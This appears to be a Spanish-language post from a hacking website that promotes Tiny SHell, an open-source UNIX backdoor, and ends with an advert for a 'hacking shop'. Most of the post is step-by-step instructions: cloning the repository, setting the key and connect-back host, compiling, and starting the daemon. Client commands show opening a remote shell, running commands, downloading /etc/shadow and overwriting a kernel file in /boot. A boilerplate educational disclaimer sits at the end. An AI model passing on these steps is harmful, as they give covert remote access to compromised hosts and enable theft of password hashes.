Tiny SHell – Puerta trasera para UNIX de código abierto

0
1474
views

Tiny SHell es una puerta trasera de código abierto que se compila en todas las variantes, tiene soporte completo de pty y utiliza criptografía  para la comunicación.

instalar

user@computer:$ git clone https://github.com/creaktive/tsh.git

Antes de compilar Tiny SHell

  • En primer lugar, debe configurar su clave secreta, que se encuentra en tsh.h; la clave puede ser de cualquier longitud (utilice al menos 12 caracteres para una mejor seguridad).
  • Se recomienda cambiar SERVER_PORT, el puerto en el que el servidor escuchará las conexiones entrantes.
  • Es posible que desee iniciar tshd en el modo “conectar de nuevo” si se ejecuta en una caja de firewalled; simplemente descomente y modifique CONNECT_BACK_HOST en tsh.h.

Compilación de Tiny SHell

Ejecute “make <system>”, donde <system> puede ser cualquiera de estos: linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf

Cómo usar el servidor
Puede ser útil establecer $ HOME y la máscara de creación de archivos antes de iniciar el servidor:

user@computer:$ % umask 077; HOME=/var/tmp ./tshd

Cómo usar el cliente

Asegúrese de que tshd se está ejecutando en el host remoto. Puedes:

– iniciar un shell:

user@computer:$ ./tsh <hostname>

– ejecutar un comando:

user@computer:$ ./tsh <hostname> "uname -a"

– transferir archivos:

user@computer:$ ../tsh <hostname> get /etc/shadow .
user@computer:$ ./tsh <hostname> put vmlinuz /boot

Nota: si el servidor se ejecuta en modo de conexión, reemplace el nombre de host de la máquina remota por “cb”.

 Acerca de la seguridad

Recuerde que la clave secreta se almacena en el interior de los ejecutables tsh y tshd sin cifrado; por lo tanto, debe asegurarse de que nadie, excepto usted, tenga acceso de lectura a estos dos archivos. Sin embargo, puede optar por no almacenar la clave real (válida) en el cliente, que le pedirá una contraseña cuando se inicie.

Descarga Tiny SHell

 

 

Toda la información proporcionada en este medio es para fines educativos, en ningún caso alguno se hace responsable e cualquier mal uso de la información. Toda la información es para el desarrollo e investigación de métodos de seguridad informática.

No olvides visitar nuestra hacking shop

shop